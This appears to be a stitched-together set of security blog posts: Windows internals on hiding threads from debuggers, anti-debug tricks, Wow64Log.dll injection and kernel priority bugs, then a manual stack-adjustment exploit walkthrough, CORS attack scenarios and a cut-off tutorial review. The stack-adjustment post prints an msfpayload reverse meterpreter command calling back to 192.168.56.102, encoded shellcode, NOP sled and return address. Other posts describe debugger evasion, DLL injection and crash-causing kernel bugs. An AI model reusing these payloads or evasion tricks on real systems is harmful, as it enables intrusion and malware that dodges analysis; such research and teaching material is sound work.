If we look again at the "NtSetInformationThread" function in disassembly, we will see that the function call is one-way i.e. you can make this function call to hide the thread from debugger but you can not make this call to un-hide the thread from debuggers.

Let's have a look at the "ZwQueryInformationThread" function. As the name implies, we can use this function to determine if a specific thread is hidden from debuggers. See below.

And here is the 64-bit version.

As you can see from the two images above, the "ThreadInformationLength" parameter must be one for this function call to succeed. If it is one as expected, nothing surprising is seen, the function just sets the first byte pointed to by the "ThreadInformation" parameter to one if the "HideFromDebugger" bit of the "_ETHREAD" structure is set. Given this knowledge, i have created a small OllyDbg v1.10 plugin to detect any hidden thread in the process being debugged esp. if we are attaching to an active process. The plugin is called HiddenThreads. You download it from here and its source code from here.

Unfortunately, in older versions of Windows e.g. XP, the "ZwQueryInformationThread" function can't be used to detect if a thread is hidden from debuggers as the ThreadHideFromDebugger information class 0x11 is simply not implemented. The function call returns ERROR_INVALID_PARAMETER.

Now that we have seen how to hide a thread from debuggers, how this works under the hood, and how to detect if a thread is hidden from debuggers, let's try to find another way to hide the thread other than calling the "ZwSetInformationThread" function.

With the introduction of the "ZwCreateThreadEx" function e.g. Windows Vista and 7, a new flags parameter is present. This flag causes new threads to be created hidden from debuggers i.e. you don't need to call the "ZwSetInformationThread" function. If we set this parameter (the 7th parameter) to 0x4, then the new thread will be hidden from debuggers. In this case, setting the "HideFromDebugger" bit occurs in the "PspAllocateThread" function. See image below.


You can find a demo here and its source code from here.


This post was written based on debugging sessions on Windows 7 64-bit. This is why you see me switching from x86 to x64.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

SuppressDebugMsg As Anti-Debug Trick

In this post i will show you a new anti-debug trick that affects many debuggers e.g. WinDbg and IDA Debugger.

When you load a module into the address space of a process usually via calling e.g.  the kernel32 "LoadLibrary" function, the debugger is notified of this through the LOAD_DLL_DEBUG_EVENT event. This occurs at the point the "NtMapViewOfSection" function calls the "DbgkMapViewOfSection" function.

As we saw in the previous post, the "HideFromDebugger" flag of the "_ETHREAD" structure and the "DebugPort" field of the "_EPROCESS" structure are queried. If the "HideFromDebugger" flag is not set and the "DebugPort" field is set, the debug event is delivered to the debugger but only after the return value of the "DbgkpSuppressDbgMsg" function is checked.

If the "DbgkpSuppressDbgMsg" function returns false, the debug event is delivered to the debugger and vice versa. Now let's see the "DbgkpSuppressDbgMsg" function in disassembly.


As you can see in the image below, it checks the "SuppressDebugMsg" flag of the 64-bit TEB of the thread. If it is set, the function returns true and the debug event is not delivered to the debugger.

Also, the "SuppressDebugMsg" field of the 32-bit TEB is queried, if the "Wow64Process" field of the "_EPROCESS" structure is set.

Notes:
1) Each Wow64 process has two Process Environment Blocks (PEBs), a 64-bit one and a 32-bit one.

2) Each thread in a Wow64 process has two Thread Information Blocks (TEBs), a 64-bit one and a 32-bit one. The 64-bit TEB is of size 2 pages and the 32-bit TEB is of size 1 page. The 32-bit TEB always follows the 64-bit TEB.

3) If the "Wow64Process" field of the "_EPROCESS" structure is set, then it is a Wow64 process (32-bit process running on 64-bit system). This field holds the address of the process's 32-bit PEB.
In WinDbg and IDA debugger, if our process loads a module e.g. walied.dll via calling e.g. the "LoadLibrary" function, the debugger receives the LOAD_DLL_DEBUG_EVENT event and caches the "hFile" field of the "LOAD_DLL_DEBUG_INFO" structure. It uses the "hFile" field to ReadFile info. e.g. debug info. from walied.dll

The problem here is that WinDbg and IDA debugger don't CloseHandle(hFile) until the UNLOAD_DLL_DEBUG_EVENT event for walied.dll is received. So, if we set the "SuppressDebugMsg" bit of TEB and then call FreeLibrary("walied.dll"), then the debugger will not receive the UNLOAD_DLL_DEBUG_EVENT for walied.dll. Any subsequent attempt to acquire an exclusive access to walied.dll via calling the "CreateFile" function will definitely fail which is a very sign of debugger existence.

A demo can be found here and its source code from here.

The trick mentioned above affects WinDbg and IDA debugger. OllyDbg v1.10 is affected but in a slightly different way. OllyDbg v1.10 does not CloseHandle(hFile) even if the corresponding UNLOAD_DLL_DEBUG_EVENT event is received.

N.B. OllyDbg v2.x is not affected since it immediately CloseHandle the "hFile" field of the "LOAD_DLL_DEBUG_INFO" structure once it receives the LOAD_DLL_DEBUG_EVENT event.

Conclusion:
Setting the "SuppressDebugMsg" bit of thread's TEB prevents the attached debugger from receiving UN/LOAD_DLL_DEBUG_EVENT's from this thread.

For debuggers to be immune to this trick, they should use the "hFile" field to read info. and close this handle immediately.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

Windows Internals: SkipThreadAttach

In this post i will not present any new tricks but i will instead discuss a new issue introduced in later versions of Windows regarding thread creation.
In a previous post, i quickly explained the ntdll "NtCreateThreadEx" function and its flag HideFromDebugger 0x4 that when passed to the function causes the new thread to be created hidden from debuggers.

In this post we will see another interesting flag that i prefer to call it SuppressDllMains 0x2. Let's see this in disassembly.

As we can see in the image above, the "PspAllocateThread" function inspects the "Flags" parameter. If the SuppressDllMains 0x2 flag is set, then the function sets the "SkipThreadAttach 0x8" bit flag in the new thread's TEB.

Similarly for the 64-bit version of the function. If the "SuppressDllMains" flag is passed, then the "SkipThreadAttach 0x8" bit flag is set in both the 32-bit TEB and 64-bit TEB of the new thread.

N.B. The bit flags are at offset 0xFCA in 32-bit TEB's and at offset 0x17EE in 64-bit TEB's.

Now let's see what the "SkipThreadAttach" bit flag does. To track this, we will have to shift to user-mode.

In OllyDbg, search for the "\xCA\x0F" (0xFCA) in ntdll.dll and see which functions make use of the "SkipThreadAttach 0x8" bit flag.

The ntdll "RtlIsCurrentThreadAttachExempt" function was among the results i found.
This function returns false if the "SkipThreadAttach" bit flag is not set.
If the "SkipThreadAttach" bit flag is set, another bit flag "RanProcessInit 0x20" is tested. If not set, the function returns true. Otherwise, the function returns false. In C code it looks something like below.

Searching for all references to the "RtlIsCurrentThreadAttachExempt" function, i found one interesting place in ntdll.dll where this function is called, that is LdrpInitializeThread. 

The "LdrpInitializeThread" function is for calling the DllMain's of loaded dlls ( and TLS callbacks as well) each time a thread is initializing (with the "fdwReason" parameter set to DLL_THREAD_ATTACH) or is exiting (with the "fdwReason" parameter set to DLL_THREAD_DETACH).

Taking the "LdrpInitializeThread" function in disassembly, we can see that if  the ntdll "RtlIsCurrentThreadAttachExempt" function returns true e.g. due to the "NtCreateThreadEx" function being called with the "Flags" parameter set to SuppressDllMains 0x2, the DllMains and TLS callbacks of loaded modules will not be called in the context of the new thread. See image below.


A good example for this is the "DbgUiIssueRemoteBreakin" function in ntdll.dll of Windows 7. This function is called by the "DebugActiveProcess" function to create the attaching thread in the context of the process to be debugged.
In Windows XP, the thread created by the "DbgUiIssueRemoteBreakin" function caused the DllMains and TLS callbacks of loaded modules to be called, presenting another layer of protection against attaching.
In Windows 7, since the "DbgUiIssueRemoteBreakin" function ends up calling the "NtCreateThreadEx" function with the "Flags" parameter set to 0x2 (SuppressDllMains), no DllMain's or TLS callbacks are called for the debugger thread.

You can download the demo of this post from here and source code from here.

You can follow me on Twitter @waleedassar

Any comments or ideas are very welcome.

Call64, Bypassing Wow64 Emulation Layer

In this post i will discuss a piece of code that i wrote to ease the process of issuing 64-bit system calls without passing through the Wow64 emulation layer implemented in Wow64cpu.dll, Wow64.dll, and Wow64win.dll.


I implemented it in a function called "Call64()". Since some arguments in 64-bit system calls are 64 bits long, the "Call64()" function expects its arguments in the form of pointers to LARGE_INTEGER structures. Also, the return value is in the form of a pointer to a LARGE_INTEGER structure.


Let's take the implementation of this function step by step.

The first argument Call64 takes is a pointer to a LARGE_INTEGER structure which will receive the return value (RAX) of this system call. It is the caller's responsibility to allocate this structure. Also, it is the caller's responsibility to type-cast the value returned in it.

The second argument the function takes is the system call number or ordinal e.g. The "ZwWaitForSingleObject" function in Windows 7 has a system call number of 0x1.

This argument is later used to formulate the shellcode used to issue the 64-bit system call.


Since this function is supposed to make 64-bit system calls with different number of arguments, the function is implemented as variadic (A function with an indefinite number of arguments) with the third argument being the number of arguments the system call expects. The next arguments are all in the form of pointers to LARGE_INTEGER structures.

The function prototype is like below:

After we have looked at how the arguments look like, let's see how the function works.

First, given the number of arguments, it calculated the stack space needed and commits it using the "_alloca" function. The newly-allocated stack space is initialized to zero.

The function takes the first four arguments and stores them in RCX, RDX, R8, and R9 respectively. Extra arguments are stored on stack. Also, shadow space is taken care of.

Using the value of the 64-bit mode Code Segment selector, the function makes a Far Call to a 64-bit shellcode responsible for issuing the system call.


Suppose that we want to make a call to the "ZwClose" function using the "Call64" function, what you should do is allocate two LARGE_INTEGER structure, one to hold the value of the "Handle" parameter and the other to receive the return value (RAX). It looks like below.

Other example is the "ProcessConsoleHostProcess" class of the "ZwSetInformationProcess" function. If we trace into this call, we will find that the Wow64 emulation layer implemented in Wow64.dll prevents Wow64 processes from making such call and thus preventing them from changing their console host processes. See implementation of the "wow64!whNtSetInformationProcess" function.

The sole solution to this is to directly make the system call without passing through the Wow64 emulation layer. The call using the "Call64" function is like below.


N.B. You should bear in mind that some system calls expect pointer arguments to be aligned by 8 and this is why we should align them by using e.g. the "_aligned_malloc" function.


Source code and examples can be found here. The function has also been implemented in a Dynamic Link Library, you can find it and its header and .lib files here.

GitHub project from here.

Any comments, ideas, or bug reports are more than welcome.

You can follow me on Twitter @waleedassar

A Real Random VirtualAlloc

In this post i will discuss one disadvantage of using the "VirtualAlloc" function to allocate memory and also suggest a trick to play around this disadvantage.

If you ever used the "VirtualAlloc" function  to allocate memory, you must have noticed that addresses returned are almost the same over instances of the same process. This is due to the "ZwAllocateVirtualMemory" function doing nothing to ensure the randomness of the base address returned, at least in Windows 7.

N.B. VirtualAlloc is just a wrap up of the "VirtualAllocEx" function which is a wrap up of the ntdll "ZwAllocateVirtualMemory" function.

To test that fact, we will create a small application that does almost nothing but calling the "ZwAllocateVirtualMemory" function and printing the base address at which memory has been allocated.
The source code looks like below.

N.B. Even though the ASLR has nothing to do with randomizing the base address of memory returned by ZwAllocateVirtualMemory, we just set the "IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE" bit field for testing purposes.

Compile the above source code and run the application several times. See image below.

As you can see in the image above, the base address is the same (0x30000) across all instances of the process and this poses a security issue.

It seems that Microsoft has taken care of this issue while allocating stack memory for threads. Now in later versions of Windows e.g. Windows 7, the "RtlCreateUserStack" function which is responsible for reserving and committing the memory for threads is calling the "NtSetInformationProcess" function with a new information class to reserve the stack memory at a random address. The new process information class is ProcessThreadStackAllocation 0x29.

Now let's see how this new information class reserves memory.

Looking at the disassembly we can see that the function checks the "StackRandomizationDisabled" flag of the "_EPROCESS" structure. We can also see the function trying to randomize some variable by using the "SystemTime" field of the "SharedUserData" page, and the "RDTSC" instruction.

The function then calls the "MiScanUserAddressSpace" and "ZwAllocateVirtualMemory" functions to reserve memory at a random base address.


Now let's try to test the "ZwSetInformationProcess" function and see if addresses returned are really random. So, we compile the code in the image below and see.
N.B. Setting the "IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE" bit field is necessary for the "StackRandomizationDisabled" bit flag of the "_EPROCESS" structure to be unset.



As you can see in the two images above, in each time we invoked the application we got a random address for the memory allocated.


Conclusion:
using the "ProcessThreadStackAllocation" class of the "ZwSetInformationProcess" function, we can guarantee a random address for memory we allocate which can be considered a security enhancement.

Code and examples for this post can be found here.

You can follow me on Twitter @waleedassar

Wow64Log

In this post i will discuss an interesting functionality that i discovered while reversing Wow64.dll and specifically the "wow64!ProcessInit" function. Now let's take the function into assembly and see how it looks like.

The first thing the function does is open a registry key by calling the "ZwOpenKey" function with the "ObjectAttributes" parameter having the "ObjectName" member set to "REGISTRY\MACHINE\SOFTWARE\Microsoft\WOW64". So our first conclusion here is that the function tries to open the registry key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wow64" to retrieve specific information that may affect the Wow64 process throughout its lifetime. Usually, the key does not exist, at least on my machine (Windows 7 SP1 64-bit).


Next, if the key was successfully opened, the "Wow64GetWow64ImageOption" function is then called with the first parameter set to the opened key handle, the second parameter pointing at the wide string "Wow64ExecuteFlags", the third parameter set to 0x4 (REG_DWORD), the fourth parameter pointing at the variable that will receive the returned value, and the fifth parameter set to 0x4 (output size).

The "Wow64GetWow64ImageOption" function opens the IFEO registry key and queries the registry value whose name is the string pointed to by the second parameter and on error, it queries the same registry value under the registry key whose handle was given in the first parameter.

The extracted flags are then used to initialize three Wow64 global variables, Wow64!Wow64CommittedStackSize, Wow64!Wow64MaximumStackSize, and Wow64InfoPtr.


Whether the registry key was successfully opened or not and whether the "Wow64ExecuteFlags" value was successfully extracted or not, the "ProcessInit" function then directly jumps to the code you see in the image below.


As you can see it is trying to load a library called "Wow64Log.dll" residing in the "System32" directory by calling the ntdll "LdrLoadDll" function. Usually, this module does not exist.

N.B. Since this code is x64, the library Wow64Log.dll must be 64-bit.

Then comes some code that tries to resolve certain function addresses from Wow64Log.Dll by calling the "LdrGetProcedureAddress" function.

N.B. The kernel32 "GetProcAddress" function is just a wrap up of the ntdll "LdrGetProcedureAddress" function.

The code we see in the image above tries to resolve addresses of the "Wow64LogInitialize", "Wow64LogSystemService", "Wow64LogMessageArgList", and "Wow64LogTerminate"  functions from the Wow64Log.dll.  If any of the functions' addresses could not be resolved, the function fails and Wow64Log.dll is unloaded from the address space by calling the ntdll "LdrUnloadDll" function.

Assuming Wow64Log.dll was found in NtSystemRoot\\System32 and the above mentioned functions were found to be exported from it, we will have the global wow64.dll function pointers, "pfnWow64LogInitialize", "pfnWow64LogSystemService", "pfnWow64LogMessageArgList", and "pfnWow64LogTerminate" holding the address of the "Wow64LogInitialize", "Wow64LogSystemService", "Wow64LogMessageArgList", and "Wow64LogTerminate" functions respectively. The "Wow64LogInitialize" function will then be immediately called.

The "Wow64LogSystemService" function will be called every time the "Wow64!Wow64SystemServiceEx" function is called i.e. called with every system call being issued. This can be used for system call logging.

The "Wow64LogMessageArgList" function is called by the "Wow64!Wow64LogPrint" function to log certain events, more likely errors.

The "Wow64LogTerminate" function is called upon process termination by the "Wow64!whNtTerminateProcess" function.


The above mentioned topic can be used as a simple method for injecting 64-bit Dll's into Wow64 (32-Bit) processes by dropping Wow64Log.dll into system32.

Here is a simple Wow64Log.dll that i wrote as a demo.


You can follow me on Twitter @waleedassar

Wow64-Specific Anti-Debug Trick

In this post i will show you an anti-debug trick that i have recently found. The trick is specific to Wow64 processes. It rely on the fact that 32-bit debuggers e.g. OllyDbg, IDA Pro Debugger, and WinDbg_x86 don't receive debug events for certain exceptions originating from 64-bit code. One example of these exceptions is EXCEPTION_BREAKPOINT 0x80000003.

N.B. In a Wow64 process in Windows 7, its 32-bit code is executing in CS=0x23, while its 64-bit code is executing in CS=0x33.

Let's take for example the ntdll "DbgPrompt" function in Windows 7 64-bit.  I chose DbgPrompt for two reasons:
1) Calls to it end up with executing the INT 0x2D instruction, which raises an EXCEPTION_BREAKPOINT.
2) The 32-bit version of it (in 32-bit version of ntdll.dll) calls the 64-bit version of it (in 64-bit version of ntdll.dll).

N.B. The ntdll "DbgPrompt" function wraps up calls to the non-exported "DebugPrompt" function.

So, now if we call the "DbgPrompt" function from within our 32-bit code, we know that the call will end up with an EXCEPTION_BREAKPOINT raised from 64-bit mode.

The interesting thing here is that if you call the function without a debugger, the exception will be raised and its exception handler will be called. One the other hand, if a debugger is present, no exceptions are raised and the instruction following INT 2D will be executed.

Given the above knowledge, i wrote a simple demo for that Wow64-specific anti-debug trick. You can download the demo from here and its source code from here.







To bypass this trick, you have to use a 64-bit debugger where the exception will be raised and seen by the debugger.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

Kernel Bug #0 ThreadIoPriority

This post is the first in a series of posts that will discuss several kernel bugs that i find in Windows Kernel. This post is about a bug found in the kernel of Windows 7 SP1 (64-bit).

Description:
With the "ThreadInformationClass" parameter set to ThreadIoPriority 0x16, passing certain signed values e.g.  0xFF3FFF3C or  0xFF3FFFFC in the variable pointed to by the "ThreadInformation" parameter to the ntdll "ZwSetInformationThread" function can be abused to arbitrarily set certain bit flags of the corresponding "_ETHREAD" structure e.g. ThreadIoPriority:3, ThreadPagePriority:3, RundownFail:1, or NeedsWorkingSetAging:1.

Bug Type:
This is due to a signedness error in the "nt!NtSetInformationThread" function.

32-Bit kernel:
64-bit kernel:


Impact:
1) The signed value leads to bypassing the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the thread's IO priority to HIGH.

2) An unprivileged thread can use certain calculated signed values to escalate its IO priority and memory priority to maximum values e.g. Raise IO priority to CRITICAL or Page priority to 7.

3) Also, certain bit flags of the corresponding "_ETHREAD" structure can be set e.g. RundownFail and NeedsWorkingSetAging.


POC:
https://www.dropbox.com/s/x7zzx5r62h0k4uz/PriorityCheckBypass.exe

Code:
http://pastebin.com/TanNzkn9

Status:
Reported to the vendor and rejected for not being a security issue.

Any comments or ideas are very welcome. You can also follow me on Twitter @waleedassar

Kernel Bug #1 ProcessIoPriority

In this post i will show you the second kernel bug that i found in the  Kernel of Windows 7 SP1 (64-bit). This one is in the "nt!NtSetInformationProcess" function.

Description:
With the "ProcessInformationClass" parameter set to ProcessIoPriority 0x21, passing certain signed values e.g.  0xFFFFFFFF or 0x8000F129 in the variable pointed to by the "ProcessInformation" parameter to the ntdll "ZwSetInformationProcess" function can be abused to arbitrarily set certain bit flags of the corresponding "_EPROCESS" structure e.g. DefaultIoPriority: Pos 27, ProcessSelfDelete : Pos 30, or SetTimerResolutionLink: Pos 31.

Bug Type:
This is due to a signedness error in the "nt!NtSetInformationProcess" function.


32-Bit kernel:


64-bit kernel:

 Impact:
1) The signed value leads to bypassing the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the process's IO priority to HIGH.


2) The signed value leads to bypassing the check for disallowed values for the process's IO priority e.g. the bug can be abused to set the process's IO priority to CRITICAL.

3) Setting the "ProcessSelfDelete" flag, which makes the target process non-killable by conventional methods.

4) Setting the "SetTimerResolutionLink" flag, which causes a BSOD (Bug check code of 0x3B)  if we terminate the process due to a null pointer dereference bug.

Poc:

Non-Killable Process

BSOD

Code:
http://pastebin.com/QejGQXib

Status:
Reported to the vendor.

Any comments or ideas are very welcome. You can also follow me on Twitter @waleedassar

Stack Adjustment by hand

When you are developing an exploit and you have very limited space for your payload you might need to adjust the stack to be able to use staged exploits. The problem, in case of a multi-stage payload, is that when the first stage that you send in your exploit payload starts to download the second stage, the stack pointer (ESP) might point to a place which is not far enough from the first stage in the memory; hence, the second stage might corrupt the code that you are executing. Stack adjustment is a technique that tries to solve this problem by setting the ESP to create more space for the second stage.

There is an easy solution for that which is really straight forward in metasploit. In your exploit you can set the ‘StackAdjustment’ attribute of the payload. Our simple example will be the ‘attftp_long_filename’ exploit with with the ‘windows/meterpreter/reverse_nonx_tcp’ payload. As you can see in the [MSF]/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb it is set to -3500. That will subtract 3500 from the ESP just before executing the payload to make enough space for the second stage. In my case the question was, how to do the same without metasploit.

It is actually not that difficult but I wanted to write about it just for the record. As a PoC I implemented the same exploit in python using the same payload, but I will focus here on creating the payload. Our goal will be to create a payload with the following structure:

NOPsled + StackAdjustment + shellcode

Lets start from behind.

Shellcode

I used the ‘msfpayload’ to generate the first stage of the payload and save it in a file in raw format. I intentionally didn’t encode it at the beginning because I wanted to encode it together with the StackAdjustment, otherwise it wouldn’t fit in the available space. So first let’s generate the payload:

root@bt:/tmp# msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=192.168.56.102 LPORT=7777 R > payload
root@bt:/tmp# hexdump payload
0000000 6afc 47eb f9e8 ffff 60ff db31 7d8b 8b3c
0000010 3d7c 0178 8bef 2057 ea01 348b 019a 31ee
0000020 99c0 c1ac 0dca c201 c084 f675 6643 ca39
0000030 e375 8b4b 244f e901 8b66 591c 4f8b 011c
0000040 03e9 992c 6c89 1c24 ff61 31e0 64db 438b
0000050 8b30 0c40 708b ad1c 688b 5e08 5366 6866
0000060 3233 7768 3273 545f b966 6072 d6ff 5395
0000070 5353 4353 4353 8953 66e7 ef81 0208 5357
0000080 b966 dfe7 d6ff b966 6fa8 d6ff 6897 a8c0
0000090 6638 6866 611e 5366 e389 106a 5753 b966
00000a0 0557 d6ff b450 500c 5753 6653 c0b9 ff38
00000b0 00e6                                  
00000b1

StackAdjustment

Then let’s see how to do the StackAdjustment. We will subtract 3500 from the ESP, that will make enough space for the second stage payload. To do that the ‘sub esp, 0xDAC’ command has to be executed on the target. We can find out the opcode with the nasm_shell.rb tool of metasploit;

root@bt:/opt/metasploit/msf3# ./tools/nasm_shell.rb 
nasm > sub esp, 0xDAC
00000000  81ECAC0D0000      sub esp,0xdac 

The happy marriage with encoding

We need to put this opcode before the msf payload and of course it has to be encoded because there are too many 0x00 characters. To do this I just catted together the opcode and the payload and piped it into the msfencode:

root@bt:/tmp# cat stack_adj payload | msfencode -b '\x00\xff' -t ruby
[*] x86/shikata_ga_nai succeeded with size 210 (iteration=1)

buf =
"\xbe\x15\x4a\xd1\x8c\xda\xde\xd9\x74\x24\xf4\x5f\x31\xc9" +
"\xb1\x2e\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\xe0\xcb" +
"\x3d\x20\x07\xcc\xbd\xc5\x7d\x27\xfa\xdd\x78\x48\xfa\xe1" +
"\x1a\x86\xde\x95\xa7\xd4\x6b\xd5\x6a\x5d\x6d\xc9\x1f\xca" +
"\x4d\x14\xf5\x7e\xb9\x8c\x08\x6f\xf3\x70\x93\xc3\x35\xba" +
"\xae\x1a\x74\xbf\x70\x69\x8e\x83\x16\xab\xa4\x71\x35\x80" +
"\xb3\x35\x9d\x16\x2d\xaf\x56\x04\xf4\xbb\x27\x29\x07\x55" +
"\xb4\x7d\x9e\x2c\xd6\x59\xbc\x4f\xd9\x42\x8d\x54\x41\x08" +
"\xad\x5a\x02\x4e\x3e\x10\x64\x53\x93\xad\xec\x63\xb5\xd7" +
"\xbf\x15\x21\x2b\x0d\xb2\xc6\x38\x43\x1d\x7d\xd9\x1a\xd3" +
"\x1d\xda\x8a\x81\x8d\x77\x61\xf9\x72\x2b\xc6\xae\xfd\x2c" +
"\xae\xd1\x11\xba\x2c\x85\xbe\xdd\x89\xce\x9e\xdd\x3f\x76" +
"\x98\x8a\xd0\x88\x0c\x5d\x46\xb7\x19\x5a\xf0\x51\x32\x85" +
"\x9d\xfb\x91\x30\xbe\x6e\x06\x10\x17\x09\x9f\xc1\x92\x2a" +
"\x09\xbd\x28\xd8\xe6\x6d\x07\xb2\x60\x2b\x67\x0c\x92\xad"

It was important to encode them together otherwise it would not fit in the 223 byte space available in the exploit.

NOPsled

The NOPsled can be easily created with metasploit, since the encoded shellcode is 210 bytes and we need to fill 223 bytes, we need to generate a 13 bytes long NOPsled:

msf  > use nop/x86/opty2
msf  nop(opty2) > generate -h
Usage: generate [options] length

Generates a NOP sled of a given length.

OPTIONS:

    -b <opt>  The list of characters to avoid: '\x00\xff'
    -h        Help banner.
    -s <opt>  The comma separated list of registers to save.
    -t <opt>  The output type: ruby, perl, c, or raw.

msf  nop(opty2) > generate -b '\x00\xff' 13
buf =
"\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"

Putting everything together

In my exploit, I simply concatenated everything together:

nopsled = "\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"
shellcode = nopsled
shellcode = shellcode + buf
shellcode = shellcode + "\x53\x93\x42\x7e" #jmp esp address
shellcode = shellcode + "\x83\xc4\x28\xc3" # add esp \x28; retn

Summary

The important takeaway here is how to adjust your stack manually if for some reason you can’t use metasploit. It is not difficult you just need to get your hands a bit dirty with bytes and hex.

CORS: Attacker Model

I am preparing myself for the Hacktivity conference in Budapest, where I am gonna talk about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I will summarise my thoughts in a couple of blog posts.

To start off with I will describe the potential attackers who could try to use CORS in their attacks and I will build an attacker model.

First let’s look at the architecture where CORS is relevant.

CORS: attack environment

CORS: attack environment

It can be seen on the picture that the attacker has control of at least one server. Of course this server could be in the internal network, however, this way the model is more general. The target can be either in the intranet or in the Internet, which brings us to the first differentiation point: the attacker’s knowledge about the internal network.

1) Knowledge

Internal attacker

Here the Internal attacker means that he has knowledge about the internal network and services, but it doesn’t mean necessarily that he is in the internal network. A good example is an ex-employee, who knows how to interact with the internal service and has great chances to do social engineering, however, he has no access to the internal network anymore.

External attacker

The attacker has no knowledge about the internal network. In this case he could either attack services on the Internet, to which he has access, and he is able to create attacks. He can also create attacks to get to know the internal network to find well known software (i.e., open source project used by the company) which he can analyse off-line.

2) Location

Although the attacker could be local, but he would have better options then using CORS, so I would generally consider a remote attacker. As shown on the architecture the attacker has control at least over one server on the Internet. This server can be his own, then he needs to trick the user to visit it, or it can be a compromised server, which he could use to inject his own code for instance through an XSS. There are enough vulnerable servers on the Internet so this is a good option as well.

3) Goal

The goal of the attacker is either to steal information from the target servers, to which he doesn’t have access, or manipulate these applications in a way that can help him in further attacks. When attacking a service on the Internet his goal might be to use the target user’s authenticated session to steal data. In case of the internal target the most important goal is to get access to the target services at all.

4) Summary

To finish the analysis, using the above described attributes a potential attack could be for example the following:

  • Well informed about the target service.
  • Remote attacker.
  • Goal: access protected content or services.

CORS: Attack scenarios

I was preparing myself for the Hacktivity conference in Budapest, where I talked about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I summarised my thoughts in a couple of blog posts. This is one of them.

As a follow up of my previous post, I would like to continue with the short analysis of the threats and attack scenarios which could exploit CORS.

There are a few things to consider here. First, that CORS is not broken. It is just a feature that can support other already existing attacks to exploit other vulnerabilities. From penetration tester point of view CORS is rather a tool, then a vulnerability. Second, the most important property in CORS is that it allows you some kind of pass through the same-origin policy with a handful of limitations.

First let’s see the possible attacks from three different perspectives:

  • Goal of the attack
  • Target’s location
  • Type of attack

1) Goal of the attack

To start off with, it is worth to understand what kind of goals can an attacker have in mind.

Exploit Cross-Site Request Forgery

The most critical problem that an attacker can exploit with CORS is the Cross-Site Request Forgery(CSRF). The main reason for that is that, with CORS the attacker can send a complex set of requests to the server even with session cookies. For instance before CORS it was a bit difficult to order a product as the CSRF attack if the order process was multistage. In that case the attacker had to submit multiple forms to send the correct requests, however, with CORS it is possible to implement the whole attack in JavaScript and when the user loads the attacker’s malicious website the JavaScript can immediately start to send requests to the target.

Another important aspect is the file upload CSRF. I have already written about that here, so I won’t go into details, however, the point is that before CORS it was not possible to upload files through CSRF because of the ‘filename’ attribute in the request. But now it is possible because JavaScript can be used to build the request.

Interact with the internal network

If the user loads the attacker’s website in the company network, that essentially means that the attacker can execute code in the internal network. Of course some pretty strong limitations apply, which I will describe in the ‘Limitations’ part. So in this case the attacker can use CORS to try to explore the network, find well known service, try to do simple scanning etc.., or simply attack a known internal service which he has no access to.

2) Target’s location

Another important aspect of attacks is the location of the target. Here when we say ‘target’, then the target service is meant, so not the user who loads the malicious content but the service, which the hacker wants to attack through CORS.

Attacking services on the Internet

This is pretty straightforward. The attacker wants to attack a service which runs publicly on the Internet, however, he wants to access some restricted content, or he wants to do it in the name of somebody else. He can setup a malicious page, trick the user to load it and when he does, the page can interact with the target service from the user’s browser. An (imaginary) example would be the following: let’s assume that Facebook has a CSRF vulnerability in the share functionality. When the innocent user opens the malicious website, the JavaScript on it send a request to Facebook to share something (which complies with the attacker’s goal) on the user’s wall. Because of CORS the JavaScript can do that and with the ‘withcredentials’ XmlHttpRequest attribute the script can access the authenticated session of the user.

Attacking internal services

In the second part the attacker uses CORS and the user’s browser as a pivot point to get access to the internal (company) network. When the user loads the attacker’s malicious page the JavaScript will be able to access services, which are not accessible for the attacker from the Internet.

3) Direct vs Indirect

Direct attack against services

I wanted to mention this case, because it might seem trivial, but still there are many people doing such mistakes because they misunderstand CORS. So the problem is that some people considers CORS as some kind of authorization mechanism. This is coming from the fact that if you send an XmlHttpRequest and the server rejects your CORS the response data will be not available for the JavaScript. What they forget is that the data is still sent to the client and the browser decides based on the response’s Allow-Origin-* headers whether to allow it to the JavaScript or not. Unfortunately this solutions fails terribly when the client happens to be a script or a netcat running in the terminal. So when I write direct attack, I mean that the attacker connects directly to the service and not through the browser of some other user.

Indirect attacks

The indirect attacks are the traditional client side attacks, when the malicious code is injected in a website, that has to be loaded by the user. When the page is loaded the malicious code attacks the target service from the user’s client.

4) Limitations

As mentioned before there are pretty strong limitations when using CORS.

Write only requests

Often when the service is well configured or not configured at all, the response will not be readable for the JavaScript. For instance if the HTTP response has no Access-Control-Allow-Origin header, then , although all data were sent to the client, the JavaScript will not be able to access it. This means that requests can be sent to the server and the requested actions will be executed (hence the write only), but the JavaScript won’t be able to read the responses. This will stop the attacker to first request a form on the website to read the CSRF-protection-token and then submit the form with the token, because it won’t be able to read the response.

withCredentials vs. Access-Control-Allow-Origin: *

This is an interesting limitation which is actually quite smart. If you send a request with credentials and the server responds with Access-Control-Allow-Origin: *, which allows every domain, then you will not see the response content from JavaScript. The reason is that the ‘withCredentials’ cannot be used if all origins are allowed. This is the last line of defense against CSRF. If you could read the response, that would break the 99% of CSRF protections, because you could first load a page with you credentials, steal the CSRF token, then do a CSRF with the token.

5) Summary

Although these different perspectives are a little redundant, but all the different attack scenarios can be built from the combination of them.

Since this is only my quick analysis, if you have other ideas to the topic let me know.

Review: Build a Network Application with Node video tutorial

I have been asked to review Joe Stanco’s Build a Network Application with Node video tutorial. So let’s see.

Node

Format

So first of all let’s see what you get. This is a Node.js video tutorial. To get a glimpse you can watch the example chapter on Youtube, here. From the format point of view, you get a web UI to watch the videos, which you can either do on-line or off-line. For instance I was watching it on the train to Vienna, so it works very well off-line. The tutorial is organized in 1-3 minutes videos. This can be useful if you want to revisit a topic later, however, it is a bit annoying when you watch it for the first time. The only problem is that the next video is not loaded automatically, hence you always have to minimise the video, click the next chapter and then click play. This is still ok, but it could be better.

Content

